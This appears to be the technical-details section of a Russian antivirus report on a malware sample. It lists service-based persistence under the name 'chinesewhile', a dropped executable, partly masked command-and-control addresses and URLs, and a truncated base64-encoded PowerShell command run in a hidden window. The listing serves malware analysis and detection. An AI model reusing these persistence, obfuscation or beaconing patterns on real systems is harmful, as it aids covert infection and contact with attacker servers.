Техническая информация
- [<HKLM>\System\CurrentControlSet\Services\chinesewhile] 'Start' = '00000002'
- [<HKLM>\System\CurrentControlSet\Services\chinesewhile] 'ImagePath' = '"%WINDIR%\SysWOW64\chinesewhile.exe"'
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -enc PAAjACAATwBnAGsAbgB4AGgAbwBtAHMAdAB3ACAAaAB0AHQAcABzADoALwAvAHcAdwB3AC4AbQBpAGMAcgBvAHMAbwBmAHQALgBjAG8AbQAvAEwAbQB5AGQAbABvAGEAcwB1AGkAcwAgACMAPgAgACQAUABuAGgAYwB0AHkAagBsAHkAPQAnAE8AbgBh...
- %HOMEPATH%\591.exe
- %HOMEPATH%\591.exe в %WINDIR%\syswow64\chinesewhile.exe
- '18#.#31.163.89':7080
- '85.##4.121.33':8443
- http://te##.#graria.org/wp-admin/6ntxbhvx-369t6xb3t-736626347/
- http://85.###.121.33:8443/sess/
- DNS ASK te##.#graria.org
- '%HOMEPATH%\591.exe'
- '%WINDIR%\syswow64\chinesewhile.exe'
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -enc PAAjACAATwBnAGsAbgB4AGgAbwBtAHMAdAB3ACAAaAB0AHQAcABzADoALwAvAHcAdwB3AC4AbQBpAGMAcgBvAHMAbwBmAHQALgBjAG8AbQAvAEwAbQB5AGQAbABvAGEAcwB1AGkAcwAgACMAPgAgACQAUABuAGgAYwB0AHkAagBsAHkAPQAnAE8AbgBh...' (со скрытым окном)